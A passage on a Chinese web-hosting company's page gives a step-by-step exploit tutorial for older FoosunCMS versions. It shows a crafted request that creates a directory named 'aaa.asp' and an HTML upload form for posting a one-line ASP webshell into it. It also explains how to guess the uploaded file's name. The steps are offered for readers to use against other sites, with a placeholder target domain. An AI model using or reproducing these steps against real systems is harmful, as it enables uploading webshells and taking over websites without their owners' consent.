• 指间主站
• 空间域名
• 企业邮局
• 在线商城
• 帮助中心
• 支付方式
• 收藏本站

• 域名注册
• 网站建设
• 虚拟主机
• 企业邮局
• 智能建站
• 平面设计
• 多媒体制作
• 改版维护
• 网站推广
• 程序开发
• 电脑维修

• ·联系电话:+86.023-75585550
• ·联系传真:+86.023-75585550
• ·24小时手机:13896886023
• ·QQ 咨 询：361652718 513960520

1.版本:应该是 4.0 sp7以下的吧(应该算不上0day漏洞了).(网上资料说的,5.0版本的我没测试),我主要用图片详细解释漏洞利用过程.
2.过程:
   a)看版本,访问网站跟admin目录,看登陆的logo (foosuncms),提示版本.
    b)注册, 访问/User/Reg_service.asp,记录这个id,如下图:
  

    c)增加.asp目录,如:aaa.asp,那么访问:/User/CommPages/FolderImageList.asp?f_UserNumber=091310I59B3&Type=AddFolder&Path=/userfiles/091310I59B3/aaa.asp//&CurrPath=/userfiles/091310I59B3
(记得将091310I59B3替换为你的注册后的编号).访问后应该看到如下的目录(否则就是不支持.asp目录了或者最新修复了漏洞的版本,后续没得搞了,不用看了,就此打住吧):

3.传一句话到aaa.asp目录,这儿我自己根据抓包编写了一个html,关键解决图片上传后文件名猜解问题(记得替换下面html里面得id与网址):
<form name=from1 method="post" enctype="multipart/form-data" target="new1" action="http://www.xxx.cn/User/Commpages/UpFileSave.asp">
数量<input name=FilesNum value=1>
<input type=file name="File1"><br>
<input name="Path" value=/UserFiles/091310I59B3/abcdefg><br>
命名方式<input name="AutoReName" value=2>
<input type=submit name="Submit" value=Submit >
</form>
<br><br>
<form name=from2 method="post" enctype="multipart/form-data" target="new2" action="http://www.xxx.cn/User/Commpages/UpFileSave.asp">
数量<input name=FilesNum value=10>
<input type=file name="File1"><br>
<input type=file name="File2"><br>
<input type=file name="File3"><br>
<input type=file name="File4"><br>
<input type=file name="File5"><br>
<input type=file name="File6"><br>
<input type=file name="File7"><br>
<input type=file name="File8"><br>
<input type=file name="File9"><br>
<input type=file name="File10"><br>
<input name="Path" value=/UserFiles/091310I59B3/aaa.asp><br>
命名方式<input name="AutoReName" value=2>
<input type=submit name="Submit" value=Submit>
</form>
<br><br>
4.猜解上传到aaa.asp目录得文件名,这儿注意观察文件名文规则与文件夹时间:

好吧,就到这儿,我没几十秒就猜到了3个: